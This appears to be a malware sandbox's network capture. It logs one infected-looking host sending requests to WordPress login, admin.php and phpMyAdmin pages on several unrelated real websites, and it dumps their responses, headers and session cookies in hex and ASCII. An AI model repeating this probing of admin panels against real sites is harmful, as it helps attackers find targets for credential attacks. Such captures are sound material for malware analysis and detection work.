pmaAuth-1_https=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/phpmyadmin/; secure last-modified: Tue, 20 Feb 2024 23:26:22 GMT
2024-02-20 23:26:22 UTC	453	IN	Data Raw: 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 42 55 79 48 61 75 73 35 36 44 6b 37 37 76 52 51 25 32 42 67 67 61 47 6c 73 38 25 32 46 67 57 4a 33 4c 43 25 32 46 4f 65 62 73 43 70 69 6b 4b 35 37 6a 55 71 7a 63 31 4e 41 6c 32 76 56 64 67 63 67 6f 7a 78 52 33 50 43 65 48 55 42 56 6d 34 32 76 55 47 39 65 74 76 63 6f 63 71 4a 6e 69 70 63 52 72 72 25 32 46 31 30 56 57 72 78 78 6d 57 49 52 42 31 4e 69 25 32 42 77 45 55 48 51 56 72 55 75 65 76 49 50 25 32 46 49 6a 38 4b 33 75 6b 51 67 7a 46 67 4c 72 65 Data Ascii: CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BUyHaus56Dk77vRQ%2BggaGls8%2FgWJ3LC%2FOebsCpikK57jUqzc1NAl2vVdgcgozxR3PCeHUBVm42vUG9etvcocqJnipcRrr%2F10VWrxxmWIRB1Ni%2BwEUHQVrUuevIP%2FIj8K3ukQgzFgLre
2024-02-20 23:26:22 UTC	1369	IN	Data Raw: 34 39 35 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 2c 6e 6f 74 72 61 6e 73 6c Data Ascii: 4958<!doctype html><html lang="en" dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="referrer" content="no-referrer"> <meta name="robots" content="noindex,nofollow,notransl
2024-02-20 23:26:22 UTC	1369	IN	Data Raw: 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 61 6a 61 78 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 6b 65 79 68 61 6e 64 6c 65 72 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2e 6d 69 6e 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 Data Ascii: src="js/dist/ajax.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/keyhandler.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/jquery/jquery-ui.min.js?v=5.2.1"></script>
2024-02-20 23:26:22 UTC	1369	IN	Data Raw: 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 64 6f 63 6c 69 6e 6b 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 66 75 6e 63 74 69 6f 6e 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 6e Data Ascii: data-cfasync="false" type="text/javascript" src="js/dist/doclinks.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/functions.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/n
2024-02-20 23:26:22 UTC	1369	IN	Data Raw: 63 6f 64 65 6d 69 72 72 6f 72 2f 61 64 64 6f 6e 2f 6c 69 6e 74 2f 73 71 6c 2d 6c 69 6e 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 74 72 61 63 65 6b 69 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 65 72 72 6f 72 5f 72 65 70 6f 72 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a Data Ascii: codemirror/addon/lint/sql-lint.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/tracekit.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/error_report.js?v=5.2.1"></script>
2024-02-20 23:26:22 UTC	1369	IN	Data Raw: 20 3d 20 27 44 6f 6e 65 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 70 72 65 76 54 65 78 74 20 3d 20 27 50 72 65 76 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6e 65 78 74 54 65 78 74 20 3d 20 27 4e 65 78 74 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 63 75 72 72 65 6e 74 54 65 78 74 20 3d 20 27 54 6f 64 61 79 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6d 6f 6e 74 68 4e 61 6d 65 73 20 3d 20 5b 0a 20 20 20 20 27 4a 61 6e 75 61 72 79 27 2c 0a 20 20 20 20 27 46 65 62 72 75 61 72 79 27 2c 0a 20 20 20 20 27 4d 61 72 63 68 27 2c 0a 20 20 20 20 27 41 70 72 69 6c 27 2c Data Ascii: = 'Done'; $.datepicker.regional[''].prevText = 'Prev'; $.datepicker.regional[''].nextText = 'Next'; $.datepicker.regional[''].currentText = 'Today'; $.datepicker.regional[''].monthNames = [ 'January', 'February', 'March', 'April',
2024-02-20 23:26:22 UTC	1369	IN	Data Raw: 6e 64 54 65 78 74 20 3d 20 27 53 65 63 6f 6e 64 27 3b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 5f 64 65 66 61 75 6c 74 73 2c 20 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 29 3b 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 65 78 74 65 6e 64 69 6e 67 56 61 6c 69 64 61 74 6f 72 4d 65 73 73 61 67 65 73 20 28 29 20 7b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 76 61 6c 69 64 61 74 6f 72 2e 6d 65 73 73 61 67 65 73 2c 20 7b 0a 20 20 20 20 72 65 71 75 69 72 65 64 3a 20 27 54 68 69 73 5c 75 30 30 32 30 66 69 65 6c 64 5c 75 30 30 32 30 69 73 5c 75 30 30 32 30 72 65 71 75 69 72 65 64 27 2c 0a 20 20 20 20 72 65 6d 6f 74 65 3a 20 27 50 6c 65 61 73 65 5c 75 30 30 32 30 66 69 78 5c 75 30 30 32 30 74 68 69 73 5c Data Ascii: ndText = 'Second'; $.extend($.timepicker._defaults, $.timepicker.regional['']);}function extendingValidatorMessages () { $.extend($.validator.messages, { required: 'This\u0020field\u0020is\u0020required', remote: 'Please\u0020fix\u0020this\
2024-02-20 23:26:22 UTC	1369	IN	Data Raw: 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 6c 65 73 73 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 30 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 6d 69 6e 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 67 72 65 61 74 65 72 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 30 5c 75 30 30 37 44 27 Data Ascii: lidator.format('Please\u0020enter\u0020a\u0020value\u0020less\u0020than\u0020or\u0020equal\u0020to\u0020\u007B0\u007D'), min: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020greater\u0020than\u0020or\u0020equal\u0020to\u0020\u007B0\u007D'
2024-02-20 23:26:22 UTC	1369	IN	Data Raw: 65 72 79 2e 76 61 6c 69 64 61 74 65 2e 6d 69 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2d 74 69 6d 65 70 69 63 6b 65 72 2d 61 64 64 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 64 65 62 6f 75 6e 63 65 2d 31 2e 30 2e 36 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 6e 75 5f 72 65 73 69 7a 65 72 2e 6a 73 27 2c 20 31 29 0a 20 20 2e 61 64 64 28 27 63 72 6f 73 73 5f 66 72 61 6d 69 6e 67 5f 70 72 6f 74 65 63 74 69 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 73 73 61 67 65 73 2e 70 68 70 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 63 6f 6e 66 69 67 2e 6a 73 27 2c 20 31 29 0a 20 20 Data Ascii: ery.validate.min.js', 0) .add('vendor/jquery/jquery-ui-timepicker-addon.js', 0) .add('vendor/jquery/jquery.debounce-1.0.6.js', 0) .add('menu_resizer.js', 1) .add('cross_framing_protection.js', 0) .add('messages.php', 0) .add('config.js', 1)

Session ID	Source IP	Source Port	Destination IP	Destination Port
297	192.168.2.6	57761	217.26.61.200	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:22 UTC	168	OUT	GET /admin.php HTTP/1.1 Host: eskimo.ch Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:22 UTC	458	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:22 GMT Server: Apache Set-Cookie: PHPSESSID=arkoh9iv7kpplugag7srr6uaq7b3i94d; path=/ Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Link: <https://eskimo.ch/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-02-20 23:26:22 UTC	7734	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 2d 43 48 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 20 3e 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 73 69 74 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 4b 35 32 4d 59 4b 4c 43 48 45 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 Data Ascii: 2000<!DOCTYPE html><html dir="ltr" lang="de-CH" prefix="og: https://ogp.me/ns#"><head >... Global site tag (gtag.js) - Google Analytics --><script async src="https://www.googletagmanager.com/gtag/js?id=G-K52MYKLCHE"></script><script> window.dataLay
2024-02-20 23:26:22 UTC	464	IN	Data Raw: 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 2e 32 35 65 6d 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 37 35 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 Data Ascii: llquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;f
2024-02-20 23:26:22 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:23 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 70 6c 61 69 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 6c 61 62 65 6c 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 70 61 64 64 69 6e 67 3a 2e 33 37 35 65 6d 20 2e 36 32 35 65 6d 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 67 72 6f 75 Data Ascii: 2000:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-grou
2024-02-20 23:26:23 UTC	6	IN	Data Raw: 65 72 2d 63 6f 6c Data Ascii: er-col
2024-02-20 23:26:23 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:23 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d Data Ascii: 2000or{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-
2024-02-20 23:26:23 UTC	6	IN	Data Raw: 72 2d 61 63 63 65 Data Ascii: r-acce
2024-02-20 23:26:23 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:23 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 6e 74 20 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 64 69 76 69 64 65 72 7b 2d 2d 64 69 76 69 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 73 65 63 6f 6e 64 61 72 79 20 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 64 69 76 69 64 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 64 69 76 69 64 65 72 5f 5f 74 65 78 74 7b 63 6f 6c 6f 72 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 73 65 63 6f 6e 64 61 72 79 20 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 20 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 74 79 70 6f 67 72 61 70 68 79 2d 73 65 63 6f 6e 64 61 72 79 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 20 29 2c 20 53 61 6e 73 2d 73 65 72 69 66 3b Data Ascii: 2000nt );}.elementor-widget-divider{--divider-color:var( --e-global-color-secondary );}.elementor-widget-divider .elementor-divider__text{color:var( --e-global-color-secondary );font-family:var( --e-global-typography-secondary-font-family ), Sans-serif;

Session ID	Source IP	Source Port	Destination IP	Destination Port
298	192.168.2.6	57977	51.159.190.167	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:22 UTC	179	OUT	GET /wp-login.php HTTP/1.1 Host: cabinet-orsika.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:22 UTC	446	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 20 Feb 2024 23:26:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.27 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure Vary: Accept-Encoding X-Cache-Status: MISS X-Powered-By: PleskLin
2024-02-20 23:26:22 UTC	8725	IN	Data Raw: 31 63 66 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 53 65 20 63 6f 6e 6e 65 63 74 65 72 20 26 6c 73 61 71 75 6f 3b 20 44 72 20 44 6f 6e 20 50 69 65 72 72 65 20 4f 72 73 69 6e 69 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 Data Ascii: 1cf4<!DOCTYPE html><html lang="fr-FR"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Se connecter &lsaquo; Dr Don Pierre Orsini — WordPress</title><meta name='robots' content='noindex, follow' /><link

Session ID	Source IP	Source Port	Destination IP	Destination Port
299	192.168.2.6	57950	162.0.235.125	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:22 UTC	183	OUT	GET /wp-login.php HTTP/1.1 Host: norwegischlernen.info Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:22 UTC	408	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 set-cookie: wordpress_test_cookie=WP+Cookie+check; path=/; secure x-frame-options: SAMEORIGIN content-length: 5377 date: Tue, 20 Feb 2024 23:26:22 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-02-20 23:26:22 UTC	5377	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; norwegischlernen.info — WordPress</title><meta name='robots' content='max-image-preview:large, noindex, noa

Session ID	Source IP	Source Port	Destination IP	Destination Port
300	192.168.2.6	57952	13.232.255.130	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:22 UTC	180	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: amsantechnology.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:22 UTC	1406	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:22 GMT Server: Apache X-ob_mode: 1 X-Frame-Options: DENY Referrer-Policy: no-referrer Content-Security-Policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; X-Content-Security-Policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; X-WebKit-CSP: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none'; X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: noindex, nofollow Expires: Tue, 20 Feb 2024 23:26:22 +0000 Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0 Pragma: no-cache Vary: Accept-Encoding Set-Cookie: pma_lang_https=en; expires=Thu, 21-Mar-2024 23:26:22 GMT; Max-Age=2592000; path=/phpMyAdmin/; secure; HttpOnly; SameSite=Strict Set-Cookie: phpMyAdmin_https=ija2a2tqnubgbv7hafhlghd0t3; path=/phpMyAdmin/; secure; HttpOnly; SameSite=Strict Last-Modified: Tue, 20 Feb 2024 23:26:22 GMT Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8
